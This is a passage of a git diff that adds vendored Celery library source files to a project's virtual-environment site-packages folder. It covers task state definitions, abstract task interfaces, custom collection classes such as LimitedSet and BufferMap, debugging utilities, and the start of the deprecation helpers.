+~~~~~~~~~~~~ + +Set of states meaning the task result is ready (has been executed). + +.. state:: UNREADY_STATES + +UNREADY_STATES +~~~~~~~~~~~~~~ + +Set of states meaning the task result is not ready (hasn't been executed). + +.. state:: EXCEPTION_STATES + +EXCEPTION_STATES +~~~~~~~~~~~~~~~~ + +Set of states meaning the task returned an exception. + +.. state:: PROPAGATE_STATES + +PROPAGATE_STATES +~~~~~~~~~~~~~~~~ + +Set of exception states that should propagate exceptions to the user. + +.. state:: ALL_STATES + +ALL_STATES +~~~~~~~~~~ + +Set of all possible states. + +Misc +---- + +""" + +__all__ = ( + 'PENDING', 'RECEIVED', 'STARTED', 'SUCCESS', 'FAILURE', + 'REVOKED', 'RETRY', 'IGNORED', 'READY_STATES', 'UNREADY_STATES', + 'EXCEPTION_STATES', 'PROPAGATE_STATES', 'precedence', 'state', +) + +#: State precedence. +#: None represents the precedence of an unknown state. +#: Lower index means higher precedence. +PRECEDENCE = [ + 'SUCCESS', + 'FAILURE', + None, + 'REVOKED', + 'STARTED', + 'RECEIVED', + 'REJECTED', + 'RETRY', + 'PENDING', +] + +#: Hash lookup of PRECEDENCE to index +PRECEDENCE_LOOKUP = dict(zip(PRECEDENCE, range(0, len(PRECEDENCE)))) +NONE_PRECEDENCE = PRECEDENCE_LOOKUP[None] + + +def precedence(state: str) -> int: + """Get the precedence index for state. + + Lower index means higher precedence. + """ + try: + return PRECEDENCE_LOOKUP[state] + except KeyError: + return NONE_PRECEDENCE + + +class state(str): + """Task state. + + State is a subclass of :class:`str`, implementing comparison + methods adhering to state precedence rules:: + + >>> from celery.states import state, PENDING, SUCCESS + + >>> state(PENDING) < state(SUCCESS) + True + + Any custom state is considered to be lower than :state:`FAILURE` and + :state:`SUCCESS`, but higher than any of the other built-in states:: + + >>> state('PROGRESS') > state(STARTED) + True + + >>> state('PROGRESS') > state('SUCCESS') + False + """ + + def __gt__(self, other: str) -> bool: + return precedence(self) < precedence(other) + + def __ge__(self, other: str) -> bool: + return precedence(self) <= precedence(other) + + def __lt__(self, other: str) -> bool: + return precedence(self) > precedence(other) + + def __le__(self, other: str) -> bool: + return precedence(self) >= precedence(other) + + +#: Task state is unknown (assumed pending since you know the id). +PENDING = 'PENDING' +#: Task was received by a worker (only used in events). +RECEIVED = 'RECEIVED' +#: Task was started by a worker (:setting:`task_track_started`). +STARTED = 'STARTED' +#: Task succeeded +SUCCESS = 'SUCCESS' +#: Task failed +FAILURE = 'FAILURE' +#: Task was revoked. +REVOKED = 'REVOKED' +#: Task was rejected (only used in events). +REJECTED = 'REJECTED' +#: Task is waiting for retry. +RETRY = 'RETRY' +IGNORED = 'IGNORED' + +READY_STATES = frozenset({SUCCESS, FAILURE, REVOKED}) +UNREADY_STATES = frozenset({PENDING, RECEIVED, STARTED, REJECTED, RETRY}) +EXCEPTION_STATES = frozenset({RETRY, FAILURE, REVOKED}) +PROPAGATE_STATES = frozenset({FAILURE, REVOKED}) + +ALL_STATES = frozenset({ + PENDING, RECEIVED, STARTED, SUCCESS, FAILURE, RETRY, REVOKED, +}) diff --git a/env/Lib/site-packages/celery/utils/__init__.py b/env/Lib/site-packages/celery/utils/__init__.py new file mode 100644 index 00000000..e905c247 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/__init__.py @@ -0,0 +1,37 @@ +"""Utility functions. + +Don't import from here directly anymore, as these are only +here for backwards compatibility. +""" +from kombu.utils.objects import cached_property +from kombu.utils.uuid import uuid + +from .functional import chunks, memoize, noop +from .imports import gen_task_name, import_from_cwd, instantiate +from .imports import qualname as get_full_cls_name +from .imports import symbol_by_name as get_cls_by_name +# ------------------------------------------------------------------------ # +# > XXX Compat +from .log import LOG_LEVELS +from .nodenames import nodename, nodesplit, worker_direct + +gen_unique_id = uuid + +__all__ = ( + 'LOG_LEVELS', + 'cached_property', + 'chunks', + 'gen_task_name', + 'gen_task_name', + 'gen_unique_id', + 'get_cls_by_name', + 'get_full_cls_name', + 'import_from_cwd', + 'instantiate', + 'memoize', + 'nodename', + 'nodesplit', + 'noop', + 'uuid', + 'worker_direct' +) diff --git a/env/Lib/site-packages/celery/utils/abstract.py b/env/Lib/site-packages/celery/utils/abstract.py new file mode 100644 index 00000000..81a04082 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/abstract.py @@ -0,0 +1,146 @@ +"""Abstract classes.""" +from abc import ABCMeta, abstractmethod +from collections.abc import Callable + +__all__ = ('CallableTask', 'CallableSignature') + + +def _hasattr(C, attr): + return any(attr in B.__dict__ for B in C.__mro__) + + +class _AbstractClass(metaclass=ABCMeta): + __required_attributes__ = frozenset() + + @classmethod + def _subclasshook_using(cls, parent, C): + return ( + cls is parent and + all(_hasattr(C, attr) for attr in cls.__required_attributes__) + ) or NotImplemented + + @classmethod + def register(cls, other): + # we override `register` to return other for use as a decorator. + type(cls).register(cls, other) + return other + + +class CallableTask(_AbstractClass, Callable): # pragma: no cover + """Task interface.""" + + __required_attributes__ = frozenset({ + 'delay', 'apply_async', 'apply', + }) + + @abstractmethod + def delay(self, *args, **kwargs): + pass + + @abstractmethod + def apply_async(self, *args, **kwargs): + pass + + @abstractmethod + def apply(self, *args, **kwargs): + pass + + @classmethod + def __subclasshook__(cls, C): + return cls._subclasshook_using(CallableTask, C) + + +class CallableSignature(CallableTask): # pragma: no cover + """Celery Signature interface.""" + + __required_attributes__ = frozenset({ + 'clone', 'freeze', 'set', 'link', 'link_error', '__or__', + }) + + @property + @abstractmethod + def name(self): + pass + + @property + @abstractmethod + def type(self): + pass + + @property + @abstractmethod + def app(self): + pass + + @property + @abstractmethod + def id(self): + pass + + @property + @abstractmethod + def task(self): + pass + + @property + @abstractmethod + def args(self): + pass + + @property + @abstractmethod + def kwargs(self): + pass + + @property + @abstractmethod + def options(self): + pass + + @property + @abstractmethod + def subtask_type(self): + pass + + @property + @abstractmethod + def chord_size(self): + pass + + @property + @abstractmethod + def immutable(self): + pass + + @abstractmethod + def clone(self, args=None, kwargs=None): + pass + + @abstractmethod + def freeze(self, id=None, group_id=None, chord=None, root_id=None, + group_index=None): + pass + + @abstractmethod + def set(self, immutable=None, **options): + pass + + @abstractmethod + def link(self, callback): + pass + + @abstractmethod + def link_error(self, errback): + pass + + @abstractmethod + def __or__(self, other): + pass + + @abstractmethod + def __invert__(self): + pass + + @classmethod + def __subclasshook__(cls, C): + return cls._subclasshook_using(CallableSignature, C) diff --git a/env/Lib/site-packages/celery/utils/collections.py b/env/Lib/site-packages/celery/utils/collections.py new file mode 100644 index 00000000..6fb559ac --- /dev/null +++ b/env/Lib/site-packages/celery/utils/collections.py @@ -0,0 +1,864 @@ +"""Custom maps, sets, sequences, and other data structures.""" +import time +from collections import OrderedDict as _OrderedDict +from collections import deque +from collections.abc import Callable, Mapping, MutableMapping, MutableSet, Sequence +from heapq import heapify, heappop, heappush +from itertools import chain, count +from queue import Empty +from typing import Any, Dict, Iterable, List # noqa + +from .functional import first, uniq +from .text import match_case + +try: + # pypy: dicts are ordered in recent versions + from __pypy__ import reversed_dict as _dict_is_ordered +except ImportError: + _dict_is_ordered = None + +try: + from django.utils.functional import LazyObject, LazySettings +except ImportError: + class LazyObject: + pass + LazySettings = LazyObject + +__all__ = ( + 'AttributeDictMixin', 'AttributeDict', 'BufferMap', 'ChainMap', + 'ConfigurationView', 'DictAttribute', 'Evictable', + 'LimitedSet', 'Messagebuffer', 'OrderedDict', + 'force_mapping', 'lpmerge', +) + +REPR_LIMITED_SET = """\ +<{name}({size}): maxlen={0.maxlen}, expires={0.expires}, minlen={0.minlen}>\ +""" + + +def force_mapping(m): + # type: (Any) -> Mapping + """Wrap object into supporting the mapping interface if necessary.""" + if isinstance(m, (LazyObject, LazySettings)): + m = m._wrapped + return DictAttribute(m) if not isinstance(m, Mapping) else m + + +def lpmerge(L, R): + # type: (Mapping, Mapping) -> Mapping + """In place left precedent dictionary merge. + + Keeps values from `L`, if the value in `R` is :const:`None`. + """ + setitem = L.__setitem__ + [setitem(k, v) for k, v in R.items() if v is not None] + return L + + +class OrderedDict(_OrderedDict): + """Dict where insertion order matters.""" + + def _LRUkey(self): + # type: () -> Any + # return value of od.keys does not support __next__, + # but this version will also not create a copy of the list. + return next(iter(self.keys())) + + if not hasattr(_OrderedDict, 'move_to_end'): + if _dict_is_ordered: # pragma: no cover + + def move_to_end(self, key, last=True): + # type: (Any, bool) -> None + if not last: + # we don't use this argument, and the only way to + # implement this on PyPy seems to be O(n): creating a + # copy with the order changed, so we just raise. + raise NotImplementedError('no last=True on PyPy') + self[key] = self.pop(key) + + else: + + def move_to_end(self, key, last=True): + # type: (Any, bool) -> None + link = self._OrderedDict__map[key] + link_prev = link[0] + link_next = link[1] + link_prev[1] = link_next + link_next[0] = link_prev + root = self._OrderedDict__root + if last: + last = root[0] + link[0] = last + link[1] = root + last[1] = root[0] = link + else: + first_node = root[1] + link[0] = root + link[1] = first_node + root[1] = first_node[0] = link + + +class AttributeDictMixin: + """Mixin for Mapping interface that adds attribute access. + + I.e., `d.key -> d[key]`). + """ + + def __getattr__(self, k): + # type: (str) -> Any + """`d.key -> d[key]`.""" + try: + return self[k] + except KeyError: + raise AttributeError( + f'{type(self).__name__!r} object has no attribute {k!r}') + + def __setattr__(self, key: str, value) -> None: + """`d[key] = value -> d.key = value`.""" + self[key] = value + + +class AttributeDict(dict, AttributeDictMixin): + """Dict subclass with attribute access.""" + + +class DictAttribute: + """Dict interface to attributes. + + `obj[k] -> obj.k` + `obj[k] = val -> obj.k = val` + """ + + obj = None + + def __init__(self, obj): + # type: (Any) -> None + object.__setattr__(self, 'obj', obj) + + def __getattr__(self, key): + # type: (Any) -> Any + return getattr(self.obj, key) + + def __setattr__(self, key, value): + # type: (Any, Any) -> None + return setattr(self.obj, key, value) + + def get(self, key, default=None): + # type: (Any, Any) -> Any + try: + return self[key] + except KeyError: + return default + + def setdefault(self, key, default=None): + # type: (Any, Any) -> None + if key not in self: + self[key] = default + + def __getitem__(self, key): + # type: (Any) -> Any + try: + return getattr(self.obj, key) + except AttributeError: + raise KeyError(key) + + def __setitem__(self, key, value): + # type: (Any, Any) -> Any + setattr(self.obj, key, value) + + def __contains__(self, key): + # type: (Any) -> bool + return hasattr(self.obj, key) + + def _iterate_keys(self): + # type: () -> Iterable + return iter(dir(self.obj)) + iterkeys = _iterate_keys + + def __iter__(self): + # type: () -> Iterable + return self._iterate_keys() + + def _iterate_items(self): + # type: () -> Iterable + for key in self._iterate_keys(): + yield key, getattr(self.obj, key) + iteritems = _iterate_items + + def _iterate_values(self): + # type: () -> Iterable + for key in self._iterate_keys(): + yield getattr(self.obj, key) + itervalues = _iterate_values + + items = _iterate_items + keys = _iterate_keys + values = _iterate_values + + +MutableMapping.register(DictAttribute) + + +class ChainMap(MutableMapping): + """Key lookup on a sequence of maps.""" + + key_t = None + changes = None + defaults = None + maps = None + _observers = () + + def __init__(self, *maps, **kwargs): + # type: (*Mapping, **Any) -> None + maps = list(maps or [{}]) + self.__dict__.update( + key_t=kwargs.get('key_t'), + maps=maps, + changes=maps[0], + defaults=maps[1:], + _observers=[], + ) + + def add_defaults(self, d): + # type: (Mapping) -> None + d = force_mapping(d) + self.defaults.insert(0, d) + self.maps.insert(1, d) + + def pop(self, key, *default): + # type: (Any, *Any) -> Any + try: + return self.maps[0].pop(key, *default) + except KeyError: + raise KeyError( + f'Key not found in the first mapping: {key!r}') + + def __missing__(self, key): + # type: (Any) -> Any + raise KeyError(key) + + def _key(self, key): + # type: (Any) -> Any + return self.key_t(key) if self.key_t is not None else key + + def __getitem__(self, key): + # type: (Any) -> Any + _key = self._key(key) + for mapping in self.maps: + try: + return mapping[_key] + except KeyError: + pass + return self.__missing__(key) + + def __setitem__(self, key, value): + # type: (Any, Any) -> None + self.changes[self._key(key)] = value + + def __delitem__(self, key): + # type: (Any) -> None + try: + del self.changes[self._key(key)] + except KeyError: + raise KeyError(f'Key not found in first mapping: {key!r}') + + def clear(self): + # type: () -> None + self.changes.clear() + + def get(self, key, default=None): + # type: (Any, Any) -> Any + try: + return self[self._key(key)] + except KeyError: + return default + + def __len__(self): + # type: () -> int + return len(set().union(*self.maps)) + + def __iter__(self): + return self._iterate_keys() + + def __contains__(self, key): + # type: (Any) -> bool + key = self._key(key) + return any(key in m for m in self.maps) + + def __bool__(self): + # type: () -> bool + return any(self.maps) + __nonzero__ = __bool__ # Py2 + + def setdefault(self, key, default=None): + # type: (Any, Any) -> None + key = self._key(key) + if key not in self: + self[key] = default + + def update(self, *args, **kwargs): + # type: (*Any, **Any) -> Any + result = self.changes.update(*args, **kwargs) + for callback in self._observers: + callback(*args, **kwargs) + return result + + def __repr__(self): + # type: () -> str + return '{0.__class__.__name__}({1})'.format( + self, ', '.join(map(repr, self.maps))) + + @classmethod + def fromkeys(cls, iterable, *args): + # type: (type, Iterable, *Any) -> 'ChainMap' + """Create a ChainMap with a single dict created from the iterable.""" + return cls(dict.fromkeys(iterable, *args)) + + def copy(self): + # type: () -> 'ChainMap' + return self.__class__(self.maps[0].copy(), *self.maps[1:]) + __copy__ = copy # Py2 + + def _iter(self, op): + # type: (Callable) -> Iterable + # defaults must be first in the stream, so values in + # changes take precedence. + # pylint: disable=bad-reversed-sequence + # Someone should teach pylint about properties. + return chain(*(op(d) for d in reversed(self.maps))) + + def _iterate_keys(self): + # type: () -> Iterable + return uniq(self._iter(lambda d: d.keys())) + iterkeys = _iterate_keys + + def _iterate_items(self): + # type: () -> Iterable + return ((key, self[key]) for key in self) + iteritems = _iterate_items + + def _iterate_values(self): + # type: () -> Iterable + return (self[key] for key in self) + itervalues = _iterate_values + + def bind_to(self, callback): + self._observers.append(callback) + + keys = _iterate_keys + items = _iterate_items + values = _iterate_values + + +class ConfigurationView(ChainMap, AttributeDictMixin): + """A view over an applications configuration dictionaries. + + Custom (but older) version of :class:`collections.ChainMap`. + + If the key does not exist in ``changes``, the ``defaults`` + dictionaries are consulted. + + Arguments: + changes (Mapping): Map of configuration changes. + defaults (List[Mapping]): List of dictionaries containing + the default configuration. + """ + + def __init__(self, changes, defaults=None, keys=None, prefix=None): + # type: (Mapping, Mapping, List[str], str) -> None + defaults = [] if defaults is None else defaults + super().__init__(changes, *defaults) + self.__dict__.update( + prefix=prefix.rstrip('_') + '_' if prefix else prefix, + _keys=keys, + ) + + def _to_keys(self, key): + # type: (str) -> Sequence[str] + prefix = self.prefix + if prefix: + pkey = prefix + key if not key.startswith(prefix) else key + return match_case(pkey, prefix), key + return key, + + def __getitem__(self, key): + # type: (str) -> Any + keys = self._to_keys(key) + getitem = super().__getitem__ + for k in keys + ( + tuple(f(key) for f in self._keys) if self._keys else ()): + try: + return getitem(k) + except KeyError: + pass + try: + # support subclasses implementing __missing__ + return self.__missing__(key) + except KeyError: + if len(keys) > 1: + raise KeyError( + 'Key not found: {0!r} (with prefix: {0!r})'.format(*keys)) + raise + + def __setitem__(self, key, value): + # type: (str, Any) -> Any + self.changes[self._key(key)] = value + + def first(self, *keys): + # type: (*str) -> Any + return first(None, (self.get(key) for key in keys)) + + def get(self, key, default=None): + # type: (str, Any) -> Any + try: + return self[key] + except KeyError: + return default + + def clear(self): + # type: () -> None + """Remove all changes, but keep defaults.""" + self.changes.clear() + + def __contains__(self, key): + # type: (str) -> bool + keys = self._to_keys(key) + return any(any(k in m for k in keys) for m in self.maps) + + def swap_with(self, other): + # type: (ConfigurationView) -> None + changes = other.__dict__['changes'] + defaults = other.__dict__['defaults'] + self.__dict__.update( + changes=changes, + defaults=defaults, + key_t=other.__dict__['key_t'], + prefix=other.__dict__['prefix'], + maps=[changes] + defaults + ) + + +class LimitedSet: + """Kind-of Set (or priority queue) with limitations. + + Good for when you need to test for membership (`a in set`), + but the set should not grow unbounded. + + ``maxlen`` is enforced at all times, so if the limit is reached + we'll also remove non-expired items. + + You can also configure ``minlen``: this is the minimal residual size + of the set. + + All arguments are optional, and no limits are enabled by default. + + Arguments: + maxlen (int): Optional max number of items. + Adding more items than ``maxlen`` will result in immediate + removal of items sorted by oldest insertion time. + + expires (float): TTL for all items. + Expired items are purged as keys are inserted. + + minlen (int): Minimal residual size of this set. + .. versionadded:: 4.0 + + Value must be less than ``maxlen`` if both are configured. + + Older expired items will be deleted, only after the set + exceeds ``minlen`` number of items. + + data (Sequence): Initial data to initialize set with. + Can be an iterable of ``(key, value)`` pairs, + a dict (``{key: insertion_time}``), or another instance + of :class:`LimitedSet`. + + Example: + >>> s = LimitedSet(maxlen=50000, expires=3600, minlen=4000) + >>> for i in range(60000): + ... s.add(i) + ... s.add(str(i)) + ... + >>> 57000 in s # last 50k inserted values are kept + True + >>> '10' in s # '10' did expire and was purged from set. + False + >>> len(s) # maxlen is reached + 50000 + >>> s.purge(now=time.monotonic() + 7200) # clock + 2 hours + >>> len(s) # now only minlen items are cached + 4000 + >>>> 57000 in s # even this item is gone now + False + """ + + max_heap_percent_overload = 15 + + def __init__(self, maxlen=0, expires=0, data=None, minlen=0): + # type: (int, float, Mapping, int) -> None + self.maxlen = 0 if maxlen is None else maxlen + self.minlen = 0 if minlen is None else minlen + self.expires = 0 if expires is None else expires + self._data = {} + self._heap = [] + + if data: + # import items from data + self.update(data) + + if not self.maxlen >= self.minlen >= 0: + raise ValueError( + 'minlen must be a positive number, less or equal to maxlen.') + if self.expires < 0: + raise ValueError('expires cannot be negative!') + + def _refresh_heap(self): + # type: () -> None + """Time consuming recreating of heap. Don't run this too often.""" + self._heap[:] = [entry for entry in self._data.values()] + heapify(self._heap) + + def _maybe_refresh_heap(self): + # type: () -> None + if self._heap_overload >= self.max_heap_percent_overload: + self._refresh_heap() + + def clear(self): + # type: () -> None + """Clear all data, start from scratch again.""" + self._data.clear() + self._heap[:] = [] + + def add(self, item, now=None): + # type: (Any, float) -> None + """Add a new item, or reset the expiry time of an existing item.""" + now = now or time.monotonic() + if item in self._data: + self.discard(item) + entry = (now, item) + self._data[item] = entry + heappush(self._heap, entry) + if self.maxlen and len(self._data) >= self.maxlen: + self.purge() + + def update(self, other): + # type: (Iterable) -> None + """Update this set from other LimitedSet, dict or iterable.""" + if not other: + return + if isinstance(other, LimitedSet): + self._data.update(other._data) + self._refresh_heap() + self.purge() + elif isinstance(other, dict): + # revokes are sent as a dict + for key, inserted in other.items(): + if isinstance(inserted, (tuple, list)): + # in case someone uses ._data directly for sending update + inserted = inserted[0] + if not isinstance(inserted, float): + raise ValueError( + 'Expecting float timestamp, got type ' + f'{type(inserted)!r} with value: {inserted}') + self.add(key, inserted) + else: + # XXX AVOID THIS, it could keep old data if more parties + # exchange them all over and over again + for obj in other: + self.add(obj) + + def discard(self, item): + # type: (Any) -> None + # mark an existing item as removed. If KeyError is not found, pass. + self._data.pop(item, None) + self._maybe_refresh_heap() + pop_value = discard + + def purge(self, now=None): + # type: (float) -> None + """Check oldest items and remove them if needed. + + Arguments: + now (float): Time of purging -- by default right now. + This can be useful for unit testing. + """ + now = now or time.monotonic() + now = now() if isinstance(now, Callable) else now + if self.maxlen: + while len(self._data) > self.maxlen: + self.pop() + # time based expiring: + if self.expires: + while len(self._data) > self.minlen >= 0: + inserted_time, _ = self._heap[0] + if inserted_time + self.expires > now: + break # oldest item hasn't expired yet + self.pop() + + def pop(self, default=None) -> Any: + # type: (Any) -> Any + """Remove and return the oldest item, or :const:`None` when empty.""" + while self._heap: + _, item = heappop(self._heap) + try: + self._data.pop(item) + except KeyError: + pass + else: + return item + return default + + def as_dict(self): + # type: () -> Dict + """Whole set as serializable dictionary. + + Example: + >>> s = LimitedSet(maxlen=200) + >>> r = LimitedSet(maxlen=200) + >>> for i in range(500): + ... s.add(i) + ... + >>> r.update(s.as_dict()) + >>> r == s + True + """ + return {key: inserted for inserted, key in self._data.values()} + + def __eq__(self, other): + # type: (Any) -> bool + return self._data == other._data + + def __repr__(self): + # type: () -> str + return REPR_LIMITED_SET.format( + self, name=type(self).__name__, size=len(self), + ) + + def __iter__(self): + # type: () -> Iterable + return (i for _, i in sorted(self._data.values())) + + def __len__(self): + # type: () -> int + return len(self._data) + + def __contains__(self, key): + # type: (Any) -> bool + return key in self._data + + def __reduce__(self): + # type: () -> Any + return self.__class__, ( + self.maxlen, self.expires, self.as_dict(), self.minlen) + + def __bool__(self): + # type: () -> bool + return bool(self._data) + __nonzero__ = __bool__ # Py2 + + @property + def _heap_overload(self): + # type: () -> float + """Compute how much is heap bigger than data [percents].""" + return len(self._heap) * 100 / max(len(self._data), 1) - 100 + + +MutableSet.register(LimitedSet) + + +class Evictable: + """Mixin for classes supporting the ``evict`` method.""" + + Empty = Empty + + def evict(self) -> None: + """Force evict until maxsize is enforced.""" + self._evict(range=count) + + def _evict(self, limit: int = 100, range=range) -> None: + try: + [self._evict1() for _ in range(limit)] + except IndexError: + pass + + def _evict1(self) -> None: + if self._evictcount <= self.maxsize: + raise IndexError() + try: + self._pop_to_evict() + except self.Empty: + raise IndexError() + + +class Messagebuffer(Evictable): + """A buffer of pending messages.""" + + Empty = Empty + + def __init__(self, maxsize, iterable=None, deque=deque): + # type: (int, Iterable, Any) -> None + self.maxsize = maxsize + self.data = deque(iterable or []) + self._append = self.data.append + self._pop = self.data.popleft + self._len = self.data.__len__ + self._extend = self.data.extend + + def put(self, item): + # type: (Any) -> None + self._append(item) + self.maxsize and self._evict() + + def extend(self, it): + # type: (Iterable) -> None + self._extend(it) + self.maxsize and self._evict() + + def take(self, *default): + # type: (*Any) -> Any + try: + return self._pop() + except IndexError: + if default: + return default[0] + raise self.Empty() + + def _pop_to_evict(self): + # type: () -> None + return self.take() + + def __repr__(self): + # type: () -> str + return f'<{type(self).__name__}: {len(self)}/{self.maxsize}>' + + def __iter__(self): + # type: () -> Iterable + while 1: + try: + yield self._pop() + except IndexError: + break + + def __len__(self): + # type: () -> int + return self._len() + + def __contains__(self, item) -> bool: + return item in self.data + + def __reversed__(self): + # type: () -> Iterable + return reversed(self.data) + + def __getitem__(self, index): + # type: (Any) -> Any + return self.data[index] + + @property + def _evictcount(self): + # type: () -> int + return len(self) + + +Sequence.register(Messagebuffer) + + +class BufferMap(OrderedDict, Evictable): + """Map of buffers.""" + + Buffer = Messagebuffer + Empty = Empty + + maxsize = None + total = 0 + bufmaxsize = None + + def __init__(self, maxsize, iterable=None, bufmaxsize=1000): + # type: (int, Iterable, int) -> None + super().__init__() + self.maxsize = maxsize + self.bufmaxsize = 1000 + if iterable: + self.update(iterable) + self.total = sum(len(buf) for buf in self.items()) + + def put(self, key, item): + # type: (Any, Any) -> None + self._get_or_create_buffer(key).put(item) + self.total += 1 + self.move_to_end(key) # least recently used. + self.maxsize and self._evict() + + def extend(self, key, it): + # type: (Any, Iterable) -> None + self._get_or_create_buffer(key).extend(it) + self.total += len(it) + self.maxsize and self._evict() + + def take(self, key, *default): + # type: (Any, *Any) -> Any + item, throw = None, False + try: + buf = self[key] + except KeyError: + throw = True + else: + try: + item = buf.take() + self.total -= 1 + except self.Empty: + throw = True + else: + self.move_to_end(key) # mark as LRU + + if throw: + if default: + return default[0] + raise self.Empty() + return item + + def _get_or_create_buffer(self, key): + # type: (Any) -> Messagebuffer + try: + return self[key] + except KeyError: + buf = self[key] = self._new_buffer() + return buf + + def _new_buffer(self): + # type: () -> Messagebuffer + return self.Buffer(maxsize=self.bufmaxsize) + + def _LRUpop(self, *default): + # type: (*Any) -> Any + return self[self._LRUkey()].take(*default) + + def _pop_to_evict(self): + # type: () -> None + for _ in range(100): + key = self._LRUkey() + buf = self[key] + try: + buf.take() + except (IndexError, self.Empty): + # buffer empty, remove it from mapping. + self.pop(key) + else: + # we removed one item + self.total -= 1 + # if buffer is empty now, remove it from mapping. + if not len(buf): + self.pop(key) + else: + # move to least recently used. + self.move_to_end(key) + break + + def __repr__(self): + # type: () -> str + return f'<{type(self).__name__}: {self.total}/{self.maxsize}>' + + @property + def _evictcount(self): + # type: () -> int + return self.total diff --git a/env/Lib/site-packages/celery/utils/debug.py b/env/Lib/site-packages/celery/utils/debug.py new file mode 100644 index 00000000..3515dc84 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/debug.py @@ -0,0 +1,193 @@ +"""Utilities for debugging memory usage, blocking calls, etc.""" +import os +import sys +import traceback +from contextlib import contextmanager +from functools import partial +from pprint import pprint + +from celery.platforms import signals +from celery.utils.text import WhateverIO + +try: + from psutil import Process +except ImportError: + Process = None + +__all__ = ( + 'blockdetection', 'sample_mem', 'memdump', 'sample', + 'humanbytes', 'mem_rss', 'ps', 'cry', +) + +UNITS = ( + (2 ** 40.0, 'TB'), + (2 ** 30.0, 'GB'), + (2 ** 20.0, 'MB'), + (2 ** 10.0, 'KB'), + (0.0, 'b'), +) + +_process = None +_mem_sample = [] + + +def _on_blocking(signum, frame): + import inspect + raise RuntimeError( + f'Blocking detection timed-out at: {inspect.getframeinfo(frame)}' + ) + + +@contextmanager +def blockdetection(timeout): + """Context that raises an exception if process is blocking. + + Uses ``SIGALRM`` to detect blocking functions. + """ + if not timeout: + yield + else: + old_handler = signals['ALRM'] + old_handler = None if old_handler == _on_blocking else old_handler + + signals['ALRM'] = _on_blocking + + try: + yield signals.arm_alarm(timeout) + finally: + if old_handler: + signals['ALRM'] = old_handler + signals.reset_alarm() + + +def sample_mem(): + """Sample RSS memory usage. + + Statistics can then be output by calling :func:`memdump`. + """ + current_rss = mem_rss() + _mem_sample.append(current_rss) + return current_rss + + +def _memdump(samples=10): # pragma: no cover + S = _mem_sample + prev = list(S) if len(S) <= samples else sample(S, samples) + _mem_sample[:] = [] + import gc + gc.collect() + after_collect = mem_rss() + return prev, after_collect + + +def memdump(samples=10, file=None): # pragma: no cover + """Dump memory statistics. + + Will print a sample of all RSS memory samples added by + calling :func:`sample_mem`, and in addition print + used RSS memory after :func:`gc.collect`. + """ + say = partial(print, file=file) + if ps() is None: + say('- rss: (psutil not installed).') + return + prev, after_collect = _memdump(samples) + if prev: + say('- rss (sample):') + for mem in prev: + say(f'- > {mem},') + say(f'- rss (end): {after_collect}.') + + +def sample(x, n, k=0): + """Given a list `x` a sample of length ``n`` of that list is returned. + + For example, if `n` is 10, and `x` has 100 items, a list of every tenth. + item is returned. + + ``k`` can be used as offset. + """ + j = len(x) // n + for _ in range(n): + try: + yield x[k] + except IndexError: + break + k += j + + +def hfloat(f, p=5): + """Convert float to value suitable for humans. + + Arguments: + f (float): The floating point number. + p (int): Floating point precision (default is 5). + """ + i = int(f) + return i if i == f else '{0:.{p}}'.format(f, p=p) + + +def humanbytes(s): + """Convert bytes to human-readable form (e.g., KB, MB).""" + return next( + f'{hfloat(s / div if div else s)}{unit}' + for div, unit in UNITS if s >= div + ) + + +def mem_rss(): + """Return RSS memory usage as a humanized string.""" + p = ps() + if p is not None: + return humanbytes(_process_memory_info(p).rss) + + +def ps(): # pragma: no cover + """Return the global :class:`psutil.Process` instance. + + Note: + Returns :const:`None` if :pypi:`psutil` is not installed. + """ + global _process + if _process is None and Process is not None: + _process = Process(os.getpid()) + return _process + + +def _process_memory_info(process): + try: + return process.memory_info() + except AttributeError: + return process.get_memory_info() + + +def cry(out=None, sepchr='=', seplen=49): # pragma: no cover + """Return stack-trace of all active threads. + + See Also: + Taken from https://gist.github.com/737056. + """ + import threading + + out = WhateverIO() if out is None else out + P = partial(print, file=out) + + # get a map of threads by their ID so we can print their names + # during the traceback dump + tmap = {t.ident: t for t in threading.enumerate()} + + sep = sepchr * seplen + for tid, frame in sys._current_frames().items(): + thread = tmap.get(tid) + if not thread: + # skip old junk (left-overs from a fork) + continue + P(f'{thread.name}') + P(sep) + traceback.print_stack(frame, file=out) + P(sep) + P('LOCAL VARIABLES') + P(sep) + pprint(frame.f_locals, stream=out) + P('\n') + return out.getvalue() diff --git a/env/Lib/site-packages/celery/utils/deprecated.py b/env/Lib/site-packages/celery/utils/deprecated.py new file mode 100644 index 00000000..a08b08b9 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/deprecated.py @@ -0,0 +1,113 @@ +"""Deprecation utilities.""" +import warnings + +from vine.utils import wraps + +from celery.exceptions import CDeprecationWarning, CPendingDeprecationWarning + +__all__ = ('Callable', 'Property', 'warn') + + +PENDING_DEPRECATION_FMT = """ + {description} is scheduled for deprecation in \ + version {deprecation} and removal in version v{removal}. \ + {alternative} +""" + +DEPRECATION_FMT = """ + {description} is deprecated and scheduled for removal in + version {removal}. {alternative} +""" + + +def warn(description=None, deprecation=None, + removal=None, alternative=None, stacklevel=2): + """Warn of (pending) deprecation.""" + ctx = {'description': description, + 'deprecation': deprecation, 'removal': removal, + 'alternative': alternative} + if deprecation is not None: + w = CPendingDeprecationWarning(PENDING_DEPRECATION_FMT.format(**ctx)) + else: + w = CDeprecationWarning(DEPRECATION_FMT.format(**ctx)) + warnings.warn(w, stacklevel=stacklevel) + + +def Callable(deprecation=None, removal=None, + alternative=None, description=None): + """Decorator for deprecated functions. + + A deprecation warning will be emitted when the function is called. + + Arguments: + deprecation (str): Version that marks first deprecation, if this + argument isn't set a ``PendingDeprecationWarning`` will be + emitted instead. + removal (str): Future version when this feature will be removed. + alternative (str): Instructions for an alternative solution (if any). + description (str): Description of what's being deprecated. + """ + def _inner(fun): + + @wraps(fun) + def __inner(*args, **kwargs): + from .imports import qualname + warn(description=description or qualname(fun), + deprecation=deprecation, + removal=removal, + alternative=alternative, + stacklevel=3) + return fun(*args, **kwargs) + return __inner + return _inner + + +def Property(deprecation=None, removal=None, + alternative=None, description=None): + """Decorator for deprecated properties.""" + def _inner(fun): + return _deprecated_property( + fun, deprecation=deprecation, removal=removal, + alternative=alternative, description=description or fun.__name__) + return _inner + + +class _deprecated_property: + + def __init__(self, fget=None, fset=None, fdel=None, doc=None, **depreinfo): + self.__get = fget + self.__set = fset + self.__del = fdel + self.__name__, self.__module__, self.__doc__ = ( + 